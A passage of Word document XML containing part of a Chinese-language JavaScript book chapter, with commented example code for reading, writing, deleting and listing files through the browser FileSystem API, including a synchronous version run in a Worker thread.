        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>写入到文件中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>writer.write(blob);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>writer.onerror=logerr;//</w:t>
      </w:r>
      <w:r>
        <w:t>记录调用</w:t>
      </w:r>
      <w:r>
        <w:t>writer()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时发生的错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(callback)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果有回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>writer.onwrite=callback;//</w:t>
      </w:r>
      <w:r>
        <w:t>则成功的时候调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>logerr);//</w:t>
      </w:r>
      <w:r>
        <w:t>记录调用</w:t>
      </w:r>
      <w:r>
        <w:t>createWriter()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时发生的错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>logerr);//</w:t>
      </w:r>
      <w:r>
        <w:t>记录调用</w:t>
      </w:r>
      <w:r>
        <w:t>getFile()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时发生的错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>删除指定的文件，完成后调用指定的回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function deleteFile(name,callback)</w:t>
      </w:r>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>filesystem.root.getFile(name,{},//</w:t>
      </w:r>
      <w:r>
        <w:t>根据指定的名字获取相应的</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(entry){//entry</w:t>
      </w:r>
      <w:r>
        <w:t>就是该</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>entry.remove(callback,//</w:t>
      </w:r>
      <w:r>
        <w:t>删除</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>logerr);//</w:t>
      </w:r>
      <w:r>
        <w:t>或者记录调用</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时发生</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>的错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>logerr);//</w:t>
      </w:r>
      <w:r>
        <w:t>记录调用</w:t>
      </w:r>
      <w:r>
        <w:t>getFile()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时发生的错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>根据指定的名字创建一个新的目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>makeDirectory(name,callback){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>filesystem.root.getDirectory(name,//</w:t>
      </w:r>
      <w:r>
        <w:t>要创建的目录的名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{//</w:t>
      </w:r>
      <w:r>
        <w:t>选项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>create:true,//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不存在，则创建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>exclusive:true//</w:t>
      </w:r>
      <w:r>
        <w:t>如果存在，则报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback,//</w:t>
      </w:r>
      <w:r>
        <w:t>完成后调用此方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>logerr);//</w:t>
      </w:r>
      <w:r>
        <w:t>记录错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>读取指定目录的内容，并以字符串数组的形式将内容传递给指定的回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function listFiles(path,callback){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果指定的内容不存在，则列</w:t>
      </w:r>
      <w:r>
        <w:t>出根目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，根据名字查找目录并将目录内容列出来（或者如果发生错误就记录错误）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!path)getFiles(filesystem.root);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else filesystem.root.getDirectory(path,{},getFiles,logerr);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getFiles(dir){//</w:t>
      </w:r>
      <w:r>
        <w:t>此方法在之前也使用过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var reader=dir.createReader();//</w:t>
      </w:r>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>DirectoryReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var list=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>用来存储文件名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reader.</w:t>
      </w:r>
      <w:r>
        <w:t>readEntries(handleEntries,//</w:t>
      </w:r>
      <w:r>
        <w:t>将每项都传递给下面的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>logerr);//</w:t>
      </w:r>
      <w:r>
        <w:t>或者记录错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>读取目录可以分成很多步</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>必须一直调用</w:t>
      </w:r>
      <w:r>
        <w:t>readEntries()</w:t>
      </w:r>
      <w:r>
        <w:t>方法直到获取到空数组为止</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>完成之后可以将整个列表传递给回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function handleEntries(entries){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(entries.length==0)callback(list);//</w:t>
      </w:r>
      <w:r>
        <w:t>完成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，将这些项添加到列表中，并继续读取</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>此类数组对象包含</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里需要挨个获取它们的名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>entries.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var name=entries[i].name;//</w:t>
      </w:r>
      <w:r>
        <w:t>获取名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(entries[i].isDirectory)name+="/";//</w:t>
      </w:r>
      <w:r>
        <w:t>标记目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>list.push(name);//</w:t>
      </w:r>
      <w:r>
        <w:t>添加到列表中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>获取下一批项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reader.readEntries(handleEntries,logerr);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程中操作文件和文件系统会更加容易些，由于</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程中都是阻塞调用，因此可以使用同步的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。例</w:t>
      </w:r>
      <w:r>
        <w:t>22-14</w:t>
      </w:r>
      <w:r>
        <w:t>定义了与例</w:t>
      </w:r>
      <w:r>
        <w:t>22-13</w:t>
      </w:r>
      <w:r>
        <w:t>同样的文件系统工具函数，不同的是它使用同步的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，代码也更加精简。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-14</w:t>
      </w:r>
      <w:r>
        <w:t>：同步文件系统</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程中使用同步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>实现的文件系统工具函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var filesystem=requestFileSystemSync(PERSISTENT,10*1024*1024);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function readTextFile(name){//</w:t>
      </w:r>
      <w:r>
        <w:t>从根</w:t>
      </w:r>
      <w:r>
        <w:t>Dire</w:t>
      </w:r>
      <w:r>
        <w:t>ctoryEntry</w:t>
      </w:r>
      <w:r>
        <w:t>中获取</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象，再从</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>中获取</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var file=filesystem.root.getFile(name).file();//</w:t>
      </w:r>
      <w:r>
        <w:t>使用同步</w:t>
      </w:r>
      <w:r>
        <w:t>FileReaderAPI</w:t>
      </w:r>
      <w:r>
        <w:t>读取</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return new FileReaderSync().readAsText(file);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function appendToFile(name,contents){//</w:t>
      </w:r>
      <w:r>
        <w:t>从根</w:t>
      </w:r>
      <w:r>
        <w:t>DirectoryEntry</w:t>
      </w:r>
      <w:r>
        <w:t>中获取</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>对象，再从</w:t>
      </w:r>
      <w:r>
        <w:t>FileEntry</w:t>
      </w:r>
      <w:r>
        <w:t>中获取</w:t>
      </w:r>
      <w:r>
        <w:t>FileWriter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>ar writer=filesystem.root.getFile(name,{create:true}).createWriter();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>writer.seek(writer.length);//</w:t>
      </w:r>
      <w:r>
        <w:t>从文件最后开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bb=new BlobBuilder()//</w:t>
      </w:r>
      <w:r>
        <w:t>将文件内容构造进</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bb.append(contents);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>writer.write(bb.getBlob());//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>写入文件中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function deleteFile(name){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>filesystem.root.getFile(name).remove();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function makeDirectory(name){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>filesystem.root.getDirectory(name,{create:true,exclusive:true});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function listFiles(path){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var dir=filesystem.root;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(path)dir=dir.getDirectory(path);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var lister=dir.createReader();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var list=[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>do{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var entries=lister.readEntries();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>entries.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var name=entries[i].name;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(entries[i].isDirectory)name+="/";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>list.push(name);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}while(entries.length</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return list;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>允许主线程通过发送消息来使用这些工具函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onmessage=function(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>消息是如下形式的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//{function:"appendToFile",args:["test","testing,testing"]}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>根据指定的</w:t>
      </w:r>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:t>调用指定的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>再将结果消息发送回去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var f=self[e.data.function];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
